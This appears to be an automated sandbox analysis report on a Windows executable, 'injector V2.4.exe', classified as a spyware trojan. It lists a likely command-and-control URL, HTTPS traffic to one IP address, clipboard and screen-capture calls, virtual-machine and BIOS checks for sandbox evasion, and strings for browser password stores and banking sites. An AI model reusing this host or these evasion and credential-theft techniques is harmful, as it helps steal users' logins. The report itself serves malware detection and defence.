          Source: injector V2.4.exe, 00000004.00000003.2202650699.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2202612238.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2241187469.0000000002C21000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2202633746.0000000002C21000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2202499828.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2295589364.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2176493627.0000000005352000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2272584249.0000000002C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
          Source: injector V2.4.exe, 00000004.00000003.2176493627.0000000005352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api$I
          Source: injector V2.4.exe, 00000004.00000003.2176493627.0000000005352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiII8
          Source: injector V2.4.exe, 00000004.00000002.2295589364.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiW
          Source: injector V2.4.exe, 00000004.00000002.2295589364.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apie
          Source: injector V2.4.exe, 00000004.00000002.2295589364.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apisk
          Source: injector V2.4.exe, 00000004.00000002.2295771988.0000000002C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/m
          Source: injector V2.4.exe, 00000004.00000003.2178125921.00000000055DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: injector V2.4.exe, 00000004.00000003.2178125921.00000000055DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: injector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
          Source: injector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
          Source: injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: injector V2.4.exe, 00000004.00000003.2178125921.00000000055DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
          Source: injector V2.4.exe, 00000004.00000003.2178125921.00000000055DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
          Source: injector V2.4.exe, 00000004.00000003.2178125921.00000000055DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: injector V2.4.exe, 00000004.00000003.2178125921.00000000055DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: injector V2.4.exe, 00000004.00000003.2178125921.00000000055DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
          Source: injector V2.4.exe, 00000004.00000003.2178125921.00000000055DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49725 version: TLS 1.2
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00433550 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00433550
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00433550 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00433550
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00433D60 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,4_2_00433D60
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004CF4D00_2_004CF4D0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D34D00_2_004D34D0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004CF9800_2_004CF980
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D15A00_2_004D15A0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004CCE700_2_004CCE70
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004C86C00_2_004C86C0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004E1FD20_2_004E1FD2
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004CD7F00_2_004CD7F0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004CF4D03_2_004CF4D0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004D34D03_2_004D34D0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004CF9803_2_004CF980
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004D15A03_2_004D15A0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004CCE703_2_004CCE70
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004C86C03_2_004C86C0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004E1FD23_2_004E1FD2
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004CD7F03_2_004CD7F0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004228A04_2_004228A0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004271404_2_00427140
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004209704_2_00420970
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043B1004_2_0043B100
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004389D04_2_004389D0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00408AE04_2_00408AE0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00418BE34_2_00418BE3
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00409BA04_2_00409BA0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004244704_2_00424470
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042E4344_2_0042E434
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042DD554_2_0042DD55
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004386604_2_00438660
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004407404_2_00440740
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00440FB04_2_00440FB0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004068404_2_00406840
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042C84A4_2_0042C84A
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004380004_2_00438000
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042C8DC4_2_0042C8DC
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004298A84_2_004298A8
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004378AF4_2_004378AF
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004269594_2_00426959
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004061704_2_00406170
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004291004_2_00429100
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004301124_2_00430112
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004269104_2_00426910
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042C9184_2_0042C918
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042C9294_2_0042C929
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004049304_2_00404930
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004241E84_2_004241E8
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004409F04_2_004409F0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042A1A24_2_0042A1A2
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004281BC4_2_004281BC
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0040DA434_2_0040DA43
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043C2504_2_0043C250
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041FAF04_2_0041FAF0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004253444_2_00425344
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004298A84_2_004298A8
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004093004_2_00409300
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004313134_2_00431313
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042D3184_2_0042D318
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00402B204_2_00402B20
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043BB304_2_0043BB30
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043F3304_2_0043F330
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004283CA4_2_004283CA
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00424BE24_2_00424BE2
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042D3804_2_0042D380
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00420BB04_2_00420BB0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004234504_2_00423450
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043F4504_2_0043F450
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041AC644_2_0041AC64
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0040546B4_2_0040546B
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00430C7A4_2_00430C7A
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00405C204_2_00405C20
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041CC204_2_0041CC20
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00406CD04_2_00406CD0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00440CD04_2_00440CD0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004304FB4_2_004304FB
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004184904_2_00418490
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004294BD4_2_004294BD
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004035504_2_00403550
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043F5504_2_0043F550
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042CD674_2_0042CD67
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041F5104_2_0041F510
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004395E94_2_004395E9
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004275804_2_00427580
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004085904_2_00408590
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00437DA04_2_00437DA0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00424DB04_2_00424DB0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004365B84_2_004365B8
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004096504_2_00409650
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042DD4E4_2_0042DD4E
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004316704_2_00431670
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004266304_2_00426630
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041CED04_2_0041CED0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041B68E4_2_0041B68E
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041EEA04_2_0041EEA0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00403F604_2_00403F60
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042E7654_2_0042E765
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004277744_2_00427774
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041DF004_2_0041DF00
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043B7004_2_0043B700
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0040AFE04_2_0040AFE0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004077E04_2_004077E0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00419FED4_2_00419FED
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: String function: 00408390 appears 48 times
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: String function: 00418480 appears 63 times
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: String function: 004D55C0 appears 66 times
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: String function: 004D8178 appears 36 times
          Source: injector V2.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: injector V2.4.exeStatic PE information: Section: .coS ZLIB complexity 1.0003382863562091
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/0@1/1
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004389D0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,4_2_004389D0
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
          Source: injector V2.4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\injector V2.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: injector V2.4.exe, 00000004.00000003.2135024624.00000000052CA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2156235794.0000000005362000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134914235.00000000052E6000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2155985287.00000000052CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: injector V2.4.exeReversingLabs: Detection: 42%
          Source: C:\Users\user\Desktop\injector V2.4.exeFile read: C:\Users\user\Desktop\injector V2.4.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"
          Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"
          Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"
          Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"Jump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"Jump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: injector V2.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: injector V2.4.exeStatic PE information: section name: .00cfg
          Source: injector V2.4.exeStatic PE information: section name: .coS
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D4BC5 push ecx; ret 0_2_004D4BD8
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004D4BC5 push ecx; ret 3_2_004D4BD8
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00415893 push ds; ret 4_2_00415894
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041432B pushad ; ret 4_2_00414334
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041458B push ds; ret 4_2_00414594
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00414D98 push edx; retf 4_2_00414D9B
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00417FEF push 0FF1762Bh; iretd 4_2_00417FF4
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004D4CA2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004D4CA2
          Source: C:\Users\user\Desktop\injector V2.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\injector V2.4.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exe TID: 4744Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exe TID: 4744Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004DC72A FindFirstFileExW,0_2_004DC72A
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004DC7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_004DC7DB
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004DC72A FindFirstFileExW,3_2_004DC72A
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004DC7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_004DC7DB
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005365000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: injector V2.4.exe, 00000004.00000002.2295589364.0000000002B7C000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2295589364.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002B7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: injector V2.4.exe, 00000004.00000003.2155622066.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
